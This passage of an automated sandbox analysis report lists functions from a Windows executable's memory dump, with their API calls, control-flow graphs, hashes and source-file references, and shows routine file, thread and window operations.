                                                                                          • Opcode ID: b798f96f77eb3bbfc51bcb7af5dd44fcbdf1b9fa233fbbed80c8d56088bb83eb
                                                                                          • Instruction ID: 62fb9a3436d9b0fa7a21919a42ed943dd2e12bf9f8dd662c0f002b9e57bca5c2
                                                                                          • Opcode Fuzzy Hash: b798f96f77eb3bbfc51bcb7af5dd44fcbdf1b9fa233fbbed80c8d56088bb83eb
                                                                                          • Instruction Fuzzy Hash: 06F04FB1C00119ABDB50AF9AD8499EEFFFCFF85300F00405AE814E2700D7B85605CBA2

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 0087FDC9: ResetEvent.KERNEL32(?,?,0087F9F3,01444088,?,008B1E74,00000000,0089F79B,000000FF,000001B8,0087FC8F,?,?,?,?,0087A5A0), ref: 0087FDE9
                                                                                            • Part of subcall function 0087FDC9: ReleaseSemaphore.KERNEL32(?,?,00000000,?,?,?,?,0087A5A0,?,?,?,?,0089F79B,000000FF), ref: 0087FDFD
                                                                                          • ReleaseSemaphore.KERNEL32(?,00000020,00000000), ref: 0087FA05
                                                                                          • CloseHandle.KERNEL32(?,?), ref: 0087FA1F
                                                                                          • DeleteCriticalSection.KERNEL32(?), ref: 0087FA38
                                                                                          • CloseHandle.KERNELBASE(?), ref: 0087FA44
                                                                                          • CloseHandle.KERNEL32(?), ref: 0087FA50
                                                                                            • Part of subcall function 0087FAC7: WaitForSingleObject.KERNEL32(?,000000FF,0087FD0B,?,?,0087FD80,?,?,?,?,?,0087FD6A), ref: 0087FACD
                                                                                            • Part of subcall function 0087FAC7: GetLastError.KERNEL32(?,?,0087FD80,?,?,?,?,?,0087FD6A), ref: 0087FAD9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                          • String ID:
                                                                                          • API String ID: 1868215902-0
                                                                                          • Opcode ID: d7414be931f82e75cbfc96d59e43c34d741b2c896a424a4d06c47f5f09e19524
                                                                                          • Instruction ID: c9700941519f4cbf942108894d17023c5d4f538f2d59c516cfa4fa76cb2094fa
                                                                                          • Opcode Fuzzy Hash: d7414be931f82e75cbfc96d59e43c34d741b2c896a424a4d06c47f5f09e19524
                                                                                          • Instruction Fuzzy Hash: 92019E32000B44EFDB319B69DD84F86BBAAFB46711F008529F2AED2965CB716800CB21

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 896 888fc8-888fe7 GetClassNameW 897 888fe9-888ffe call 880b12 896->897 898 88900f-889011 896->898 903 88900e 897->903 904 889000-88900c FindWindowExW 897->904 900 88901c-889020 898->900 901 889013-889016 SHAutoComplete 898->901 901->900 903->898 904->903
                                                                                          APIs
                                                                                          • GetClassNameW.USER32(?,?,00000050), ref: 00888FDF
                                                                                          • SHAutoComplete.SHLWAPI(?,00000010), ref: 00889016
                                                                                            • Part of subcall function 00880B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0087AC49,?,?,?,0087ABF8,?,-00000002,?,00000000,?), ref: 00880B28
                                                                                          • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00889006
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                          • String ID: EDIT
                                                                                          • API String ID: 4243998846-3080729518
                                                                                          • Opcode ID: fad653cf897de4de1e4ee08d62faf96decd7782eff6eabf150096ce37b5690e2
                                                                                          • Instruction ID: 45de21eb989921775f4ab31de088c25de719b86d94e3c72cf9a026e01174abb6
                                                                                          • Opcode Fuzzy Hash: fad653cf897de4de1e4ee08d62faf96decd7782eff6eabf150096ce37b5690e2
                                                                                          • Instruction Fuzzy Hash: CEF0893260163867FB306A659C05FAB76ACFB46B11F080065FA40F2981D764AD01C7E6

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 905 879f2a-879f46 call 88cec0 908 879f53 905->908 909 879f48-879f51 905->909 910 879f57-879f60 908->910 909->908 909->910 911 879f62-879f6b 910->911 912 879f6d 910->912 911->912 913 879f71-879f7a 911->913 912->913 914 879f7c-879f86 913->914 915 879f88 913->915 914->915 916 879f8c-879f9f call 879e13 914->916 915->916 919 879fb5 916->919 920 879fa1-879fa3 916->920 922 879fb7-879fdd CreateFileW 919->922 920->919 921 879fa5-879fb3 call 87a0c3 920->921 921->922 924 87a027-87a02c 922->924 925 879fdf-879ff7 call 87b275 922->925 928 87a02e-87a035 call 87ff6f 924->928 929 87a03a-87a03f 924->929 937 87a0b6-87a0c0 925->937 938 879ffd-87a021 CreateFileW 925->938 928->929 932 87a041-87a048 call 87ff6f 929->932 933 87a04d-87a052 929->933 932->933 935 87a054-87a05b call 87ff6f 933->935 936 87a060-87a0a4 SetFileTime CloseHandle 933->936 935->936 936->937 940 87a0a6-87a0b1 call 87a0c3 936->940 938->924 938->937 940->937
                                                                                          APIs
                                                                                          • CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00877F55,?,?,?), ref: 00879FD0
                                                                                          • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00877F55,?,?), ref: 0087A014
                                                                                          • SetFileTime.KERNELBASE(?,00000800,?,00000000,?,00000000,?,00877F55,?,?,?,?,?,?,?,?), ref: 0087A095
                                                                                          • CloseHandle.KERNEL32(?,?,00000000,?,00877F55,?,?,?,?,?,?,?,?,?,?,?), ref: 0087A09C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Create$CloseHandleTime
                                                                                          • String ID:
                                                                                          • API String ID: 2287278272-0
                                                                                          • Opcode ID: f3aa83bc94cffebe5c04da57cf2d1f6d1ad18b0c4f10feaa0f6af74892fc8f5e
                                                                                          • Instruction ID: 97a1fdfc9b897212311f1ba7128c06f75a6961c757c9fe32e1ac0f313c79aed4
                                                                                          • Opcode Fuzzy Hash: f3aa83bc94cffebe5c04da57cf2d1f6d1ad18b0c4f10feaa0f6af74892fc8f5e
                                                                                          • Instruction Fuzzy Hash: DF41CE31248380AAE735DE28CC45FAEBBE8FB85700F04891DF5E8D31C5DA64DA088B53

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 942 87973d-87975e call 88cec0 945 879767 942->945 946 879760-879765 942->946 947 879769-879786 945->947 946->945 946->947 948 87978e-879798 947->948 949 879788 947->949 950 87979d-8797c8 CreateFileW 948->950 951 87979a 948->951 949->948 952 87982c-879841 950->952 953 8797ca-8797ec GetLastError call 87b275 950->953 951->950 955 879843-879856 call 87f10e 952->955 956 87985b-879866 952->956 959 8797ee-879810 CreateFileW GetLastError 953->959 960 87981b-879820 953->960 955->956 961 879816-879819 959->961 962 879812 959->962 960->952 963 879822 960->963 961->952 961->960 962->961 963->952
                                                                                          APIs
                                                                                          • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,-00000001,00000000,?,00000000,?,?,0087777A,?,00000005,?,00000011), ref: 008797BD
                                                                                          • GetLastError.KERNEL32(?,?,0087777A,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008797CA
                                                                                          • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,0087777A,?,00000005,?), ref: 008797FF
                                                                                          • GetLastError.KERNEL32(?,?,0087777A,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00879807
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateErrorFileLast
                                                                                          • String ID:
                                                                                          • API String ID: 1214770103-0
                                                                                          • Opcode ID: 55b8f79a6afaa98c199b87540ad2c6a54084b633a46b2c3ee7f89cd175e5d10d
                                                                                          • Instruction ID: 1645c290221f9e78de94871949aaa0b8a6ea0c2609dfadeb37bb7804d7845ee8
                                                                                          • Opcode Fuzzy Hash: 55b8f79a6afaa98c199b87540ad2c6a54084b633a46b2c3ee7f89cd175e5d10d
                                                                                          • Instruction Fuzzy Hash: 073154708407456FE3209F248C45BE6BBA4FB46360F108629F9D4C72D1E375D888CBA1
                                                                                          APIs
                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00879623
                                                                                          • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 0087963B
                                                                                          • GetLastError.KERNEL32 ref: 0087966D
                                                                                          • GetLastError.KERNEL32 ref: 0087968C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$FileHandleRead
                                                                                          • String ID:
                                                                                          • API String ID: 2244327787-0
                                                                                          • Opcode ID: dbbe08ce5a4a382117bfd14257348d086342cc84aeaf8ff83e1e0fb8d6338249
                                                                                          • Instruction ID: b0613d9f3d3f0e7372fc1035863423e6d539831aac021e26e072bbbaa1580029
                                                                                          • Opcode Fuzzy Hash: dbbe08ce5a4a382117bfd14257348d086342cc84aeaf8ff83e1e0fb8d6338249
                                                                                          • Instruction Fuzzy Hash: E3117970500608EBDF209F65C804A6A77A9FB26335F10C62AF9EEC5298D73ACD40DF52
                                                                                          APIs
                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00892213,00000000,00000000,?,00897778,00892213,00000000,00000000,00000000,?,00897975,00000006,FlsSetValue), ref: 00897803
                                                                                          • GetLastError.KERNEL32(?,00897778,00892213,00000000,00000000,00000000,?,00897975,00000006,FlsSetValue,008A3768,008A3770,00000000,00000364,?,008963F1), ref: 0089780F
                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00897778,00892213,00000000,00000000,00000000,?,00897975,00000006,FlsSetValue,008A3768,008A3770,00000000), ref: 0089781D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                          • String ID:
                                                                                          • API String ID: 3177248105-0
                                                                                          • Opcode ID: 395ca92f2642b4175161bef91ddb4976c88df901ab360eedf88d6689c9954d1c
                                                                                          • Instruction ID: bf81a57fdf919e1d12dd5c2f3ddd45d471c25cb016912e1e758ca3a148416fdb
                                                                                          • Opcode Fuzzy Hash: 395ca92f2642b4175161bef91ddb4976c88df901ab360eedf88d6689c9954d1c
                                                                                          • Instruction Fuzzy Hash: E701FC32725226ABDB215B799C48E6A7798FF457B2B140630F906E7640D720D800CAD4
                                                                                          APIs
                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0088992F
                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00889940
                                                                                          • TranslateMessage.USER32(?), ref: 0088994A
                                                                                          • DispatchMessageW.USER32(?), ref: 00889954
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$DispatchPeekTranslate
                                                                                          • String ID:
                                                                                          • API String ID: 4217535847-0
                                                                                          • Opcode ID: 5edb2d00dd040efcc08b449f050ccbe5cbc2d0d53169c0d536c96b418f1eeedc
                                                                                          • Instruction ID: 40378df34ec88d338b93cee452d734be7aa2a81a09c8dc10e276952ee71ddbda
                                                                                          • Opcode Fuzzy Hash: 5edb2d00dd040efcc08b449f050ccbe5cbc2d0d53169c0d536c96b418f1eeedc
                                                                                          • Instruction Fuzzy Hash: 4DE0ED72C0212EA79B24ABE6AC4CCEF7FACFE072657004015B519D2800D7789506C7F1
                                                                                          APIs
                                                                                          • CreateThread.KERNELBASE(00000000,00010000,Function_0000FD61,?,00000000,00000000), ref: 0087FBD5
                                                                                          • SetThreadPriority.KERNEL32(?,00000000), ref: 0087FC1C
                                                                                            • Part of subcall function 00876DD3: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00876DF1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                          • String ID: CreateThread failed
                                                                                          • API String ID: 2655393344-3849766595
                                                                                          • Opcode ID: c79dac411fd48f37d9cb2093cd3a0218d06a552da4fa291e50051d1c5f1ae086
                                                                                          • Instruction ID: 42503b99fc6412158ee9d8e102236866adee3936efd3e5e16ff085e800532db9
                                                                                          • Opcode Fuzzy Hash: c79dac411fd48f37d9cb2093cd3a0218d06a552da4fa291e50051d1c5f1ae086
                                                                                          • Instruction Fuzzy Hash: AA0126713047096FE3206F59DC42F627799FB82721F10443EFB46D2585DAE2E8418631
                                                                                          APIs
                                                                                          • GetStdHandle.KERNEL32(000000F5,?,?,0087C853,00000001,?,?,?,00000000,0088420B,?,?,?,?,?,00883CB0), ref: 00879BE3
                                                                                          • WriteFile.KERNEL32(?,00000000,?,00883EB8,00000000,?,?,00000000,0088420B,?,?,?,?,?,00883CB0,?), ref: 00879C23
                                                                                          • WriteFile.KERNELBASE(?,00000000,?,00883EB8,00000000,?,00000001,?,?,0087C853,00000001,?,?,?,00000000,0088420B), ref: 00879C50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileWrite$Handle
                                                                                          • String ID:
                                                                                          • API String ID: 4209713984-0
                                                                                          • Opcode ID: 7136e9d5fbc78980258ff638680bacaf39a676440288682bd015f1338de91c8d
                                                                                          • Instruction ID: 8d4bda59bbc8662aeef6f2a075165d04afab1823cc9d88fcc4b400e38a04e6ca
                                                                                          • Opcode Fuzzy Hash: 7136e9d5fbc78980258ff638680bacaf39a676440288682bd015f1338de91c8d
                                                                                          • Instruction Fuzzy Hash: 62314571108619AFEF21CE18D848BA6BBE8FB92710F00C119F5D8D75D4C735E848CBA2
                                                                                          APIs
                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00879D92,?,00000001,00000000,?,?), ref: 00879EAD
                                                                                          • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00879D92,?,00000001,00000000,?,?), ref: 00879EE0
                                                                                          • GetLastError.KERNEL32(?,?,?,?,00879D92,?,00000001,00000000,?,?), ref: 00879EFD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateDirectory$ErrorLast
                                                                                          • String ID:
                                                                                          • API String ID: 2485089472-0
                                                                                          • Opcode ID: 5435fb96cf973c5f4e7c2cd3caf2066077c2417503a59fd7965e1ae71dd9b65a
                                                                                          • Instruction ID: 52cab8d1b6a8c4399c6e7acb9cf12eecc962a21236cbdac250c7466c1ce9e910
                                                                                          • Opcode Fuzzy Hash: 5435fb96cf973c5f4e7c2cd3caf2066077c2417503a59fd7965e1ae71dd9b65a
                                                                                          • Instruction Fuzzy Hash: 2F01F532110158A6EB21EA6C8C45FFF374DFF06341F088411F88DD2499DBA0C98197E2
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog
                                                                                          • String ID: CMT
                                                                                          • API String ID: 3519838083-2756464174
                                                                                          • Opcode ID: 211cce19b02a4b64e2e32533660922a1d2c9d9c1ec5ac832d954b139aa29aeb3
                                                                                          • Instruction ID: 0619b2a9dfc0c15bdbe2b9396d08142789a16bb74059be3bd6ef0ef0d3f2a4ed
                                                                                          • Opcode Fuzzy Hash: 211cce19b02a4b64e2e32533660922a1d2c9d9c1ec5ac832d954b139aa29aeb3
                                                                                          • Instruction Fuzzy Hash: F8619E71504F44AADB21DB78CC459E7BBE8FB14301F44896EE1AEC7146DB32AA48DF12
                                                                                          APIs
                                                                                          • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 008982E8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Info
                                                                                          • String ID:
                                                                                          • API String ID: 1807457897-3916222277
                                                                                          • Opcode ID: 26aa8535b1d4bd339781095f99999a5193a2298daeb5c0e0ba3434bd5e562f64
                                                                                          • Instruction ID: 8ac48a68a39c1f28c0d7239cb4a4cafc976748d93df859cc228f943295a8a216
                                                                                          • Opcode Fuzzy Hash: 26aa8535b1d4bd339781095f99999a5193a2298daeb5c0e0ba3434bd5e562f64
                                                                                          • Instruction Fuzzy Hash: B641197050424DDBDF229E288C84AFABBA9FF46708F5804EDE58AC6242D6359945DF60
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 00871DA6
                                                                                            • Part of subcall function 00873AA3: __EH_prolog.LIBCMT ref: 00873AA8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog
                                                                                          • String ID: CMT
                                                                                          • API String ID: 3519838083-2756464174
                                                                                          • Opcode ID: e97a60b69dfc66552a25e425fbeb9ed466ce15a455e7f9ec0ddd5e1e5fbf2be6
                                                                                          • Instruction ID: 7ee73e44629623c249d77b91b180c5e8cc7bf05d372c08d783b39e0bda7340d1
                                                                                          • Opcode Fuzzy Hash: e97a60b69dfc66552a25e425fbeb9ed466ce15a455e7f9ec0ddd5e1e5fbf2be6
                                                                                          • Instruction Fuzzy Hash: 702126729002099BCF15EF9CC9459EEFBF6FF58300B104069E849A3665CB329A14DB62
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog
                                                                                          • String ID: CMT
                                                                                          • API String ID: 3519838083-2756464174
                                                                                          • Opcode ID: ab6583e67bd5e8436b35d7b28c66db7766209f0fc9ed4b31a171facee2979207
                                                                                          • Instruction ID: 97740e4653805c1838568176ebc8f9a8746cd7681c13afa2199961a61181930a
                                                                                          • Opcode Fuzzy Hash: ab6583e67bd5e8436b35d7b28c66db7766209f0fc9ed4b31a171facee2979207
                                                                                          • Instruction Fuzzy Hash: F311AE70A00205AFDF04DF6CC499ABEFBBAFF95300F44805AE409D7645DB30D952DA61
                                                                                          APIs
                                                                                          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,F5E85006,00000001,?,000000FF), ref: 00897A7A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
